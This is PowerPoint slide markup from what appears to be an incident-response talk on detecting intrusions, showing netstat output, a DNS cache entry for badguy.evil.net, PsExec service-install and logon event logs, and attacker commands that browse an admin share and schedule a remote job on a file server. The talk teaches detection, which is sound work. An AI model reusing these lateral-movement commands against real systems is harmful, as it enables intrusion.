              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \\fileserv\c$\windows\temp\windows\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \WINDOWS\system32\CMD.EXE - at \\fileserv 1 /d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19509152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Ports Listing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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18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224702" y="1238075"/>
            <a:ext cx="8611066" cy="3108543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sz="1400" dirty="0"/>
              <a:t>Active Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  Proto  Local Address          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>		Foreign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Address        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> State                    PID</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  TCP    0.0.0.0:25             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   		0.0.0.0:0                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>LISTENING       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  3660</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  TCP    0.0.0.0:80             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   		0.0.0.0:0                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>LISTENING       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  3660</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  TCP    0.0.0.0:135            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  		0.0.0.0:0                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>LISTENING       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  1008</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  TCP    0.0.0.0:443            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  		0.0.0.0:0                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>LISTENING       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  3660</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  TCP    0.0.0.0:445            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  		0.0.0.0:0                      LISTENING         4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  TCP    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>0.0.0.0:8080           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> 		0.0.0.0:0              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>       LISTENING         3660</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  TCP    0.0.0.0:8443           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> 		0.0.0.0:0                      LISTENING         3660</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   TCP    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>169.254.150.226:139    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	0.0.0.0:0                      LISTENING          4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  TCP    127.0.0.1:5152         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>		111.111.111.111:443    ESTABLISHED    3652</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  TCP    172.20.240.126:53669   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	192.168.213.8:443      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>ESTABLISHED    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>5580</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="C:\Users\mscutt\Documents\MIRcon\listening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4701" y="4350726"/>
            <a:ext cx="2983106" cy="20881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965482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DNS Cache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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19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325273" y="1350661"/>
            <a:ext cx="3853710" cy="4893647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sz="1200" dirty="0"/>
              <a:t>badguy.evil.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>----------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Record Name . . . . . : badguy.evil.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Record Type . . . . . : 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Time To Live  . . . . : 86226</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Data Length . . . . . : 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Section . . . . . . . : Answer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>A (Host) Record . . . : 111.111.111.111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>feedproxy.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>----------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Record Name . . . . . : feedproxy.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Record Type . . . . . : 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Time To Live  . . . . : 88</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Data Length . . . . . : 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Section . . . . . . . : Answer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>CNAME Record  . . . . : www4.l.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>exchange.acmeco.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>----------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Record Name . . . . . : exchange.acmeco.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Record Type . . . . . : 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Time To Live  . . . . : 88</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Data Length . . . . . : 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Section . . . . . . . : Answer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>CNAME Record  . . . . : 192.168.213.8</a:t>
            </a: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26238" y="1338488"/>
            <a:ext cx="4060095" cy="4372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052723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What is APT?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Webshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Galore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Search Order Hijinks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“It doesn’t have internet access”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tiny Terror</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Discovering Evil Through Incident Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Q&amp;A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Stories From the Field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8E4241-3A02-CC46-B36E-7394D8EDCFBE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9348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Persistence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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="C:\Users\mscutt\Documents\MIRcon\autoruns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1033" y="1774637"/>
            <a:ext cx="5137424" cy="45372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C:\Users\mscutt\Documents\MIRcon\redline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22289" y="1301751"/>
            <a:ext cx="4899379" cy="42924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374516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Filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Clues</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Content Placeholder 10" descr="Screen Shot 2013-10-04 at 6.35.46 AM.png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39920" b="-39920"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="412348"/>
            <a:ext cx="8597900" cy="6013852"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13982587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62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Type :		Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Date :		10/3/2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Time :		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>16:21:11</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Event :		7045</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Source :		Service Control Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Category :	None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>User :		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ACMECO\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>superadmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>:	WIN-3KKQ01DMS2I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Description:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>A service was installed in the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Service Name:  PsExec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Service File Name:  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SystemRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>%\PSEXESVC.EXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Service Type:  user mode service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Service Start Type:  demand start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Service Account:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>LocalSystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Type :		Audit Success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Date :		10/03/2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Time :		16:21:08</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Event :		4624</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Source :		Microsoft-Windows-Security-Auditing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Category :	Logon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>User :		N/A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Computer :	OWNEDBOX.ACMECO.COM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Description:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>An account was successfully logged on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Logon Type:			3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>New Logon:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Security ID:		S-1-5-21-2990868922-1773544019-572936875-1085</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Account Name:		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>superadmmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Account Domain:		ACMECO	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Network Information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Workstation Name:	ANOTHERBOX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Source Network Address:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>10.199.5.19</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	Source Port:		29468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Event Logs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Frame 4"/>
          <p:cNvSpPr/>
